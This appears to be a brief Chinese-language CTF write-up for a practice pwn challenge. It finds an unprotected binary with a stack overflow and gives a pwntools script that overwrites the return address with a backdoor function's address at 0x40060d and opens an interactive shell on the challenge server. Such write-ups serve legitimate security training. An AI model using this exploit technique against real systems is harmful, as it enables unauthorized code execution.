checksec一下,发现啥保护也没开
IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sl=lambda x:io.sendline(x)
io=remote('node3.buuoj.cn',29040)
payload='a'*(0x40+8)+p64(0x40060d)
sl(payload)
io.interactive()